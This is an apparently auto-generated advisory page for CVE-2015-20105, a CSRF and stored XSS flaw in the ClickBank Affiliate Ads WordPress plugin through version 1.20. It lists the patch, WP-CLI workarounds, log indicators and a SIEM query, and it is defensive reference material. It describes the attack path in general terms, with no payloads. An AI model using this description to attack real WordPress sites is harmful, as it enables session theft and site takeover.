CVE-2015-20105
📋 TL;DR
This vulnerability in the ClickBank Affiliate Ads WordPress plugin allows attackers to change plugin settings via CSRF attacks when an admin is logged in, and enables stored cross-site scripting (XSS) attacks due to improper output escaping. It affects WordPress sites using this plugin up to version 1.20. Attackers can inject malicious scripts that execute in visitors' browsers.
💻 Affected Systems
- ClickBank Affiliate Ads WordPress Plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attacker gains administrative control of WordPress site, injects persistent malware that steals credentials from all visitors, and potentially compromises the entire web server.
Likely Case
Attacker injects malicious JavaScript that steals admin cookies/sessions, redirects visitors to phishing sites, or displays unwanted advertisements.
If Mitigated
With proper CSRF protection and output escaping, no impact beyond failed exploitation attempts.
🎯 Exploit Status
CSRF exploitation requires tricking logged-in admin to visit malicious page. XSS payloads can be stored persistently.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.21 or later
Vendor Advisory: https://wpscan.com/vulnerability/2bc3af7e-5542-40c4-8141-7c49e8df68f0
Restart Required: No
Instructions:
1. Update plugin to version 1.21 or later via WordPress admin panel. 2. Verify update completed successfully. 3. Clear browser cache and test plugin functionality.
🔧 Temporary Workarounds
Disable Plugin
allTemporarily disable the vulnerable plugin until patched
wp plugin deactivate clickbank-affiliate-ads
Apply CSRF Protection
allAdd CSRF tokens to plugin settings form via custom code
🧯 If You Can't Patch
- Remove plugin entirely and use alternative affiliate solutions
- Implement strict Content Security Policy (CSP) headers to mitigate XSS impact
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel > Plugins > ClickBank Affiliate Ads version. If version is 1.20 or earlier, vulnerable.Check Version:
wp plugin list --name=clickbank-affiliate-ads --field=versionVerify Fix Applied:
Verify plugin version is 1.21 or later in WordPress admin panel and test settings save functionality.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /wp-admin/admin.php?page=clickbank-affiliate-ads
- JavaScript injection in plugin settings fields
Network Indicators:
- CSRF attack patterns targeting plugin settings endpoint
- Malicious script loading from plugin content
SIEM Query:
source="wordpress" AND (uri="/wp-admin/admin.php?page=clickbank-affiliate-ads" OR plugin="clickbank-affiliate-ads")🔗 References
- https://packetstormsecurity.com/files/131814/
- https://seclists.org/bugtraq/2015/May/45
- https://wpscan.com/vulnerability/2bc3af7e-5542-40c4-8141-7c49e8df68f0
- https://packetstormsecurity.com/files/131814/
- https://seclists.org/bugtraq/2015/May/45
- https://wpscan.com/vulnerability/2bc3af7e-5542-40c4-8141-7c49e8df68f0
